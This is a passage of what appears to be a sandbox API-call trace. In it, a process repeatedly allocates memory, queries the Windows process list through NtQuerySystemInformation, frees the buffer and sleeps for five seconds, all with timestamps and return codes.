FreeType=0x8000) returned 0x0 [0233.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.976] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.983] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.013] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.053] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.060] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.081] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.102] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 